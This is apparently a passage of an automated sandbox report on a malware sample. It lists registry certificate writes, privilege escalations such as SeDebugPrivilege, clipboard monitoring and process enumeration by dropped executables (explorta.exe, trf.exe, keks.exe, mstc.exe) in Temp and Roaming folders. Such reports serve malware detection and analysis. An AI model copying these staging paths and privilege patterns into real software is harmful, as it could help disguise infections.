c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\1000017002\dfb8c0b47f.exe N/A
N/A N/A C:\Users\Admin\1000017002\dfb8c0b47f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
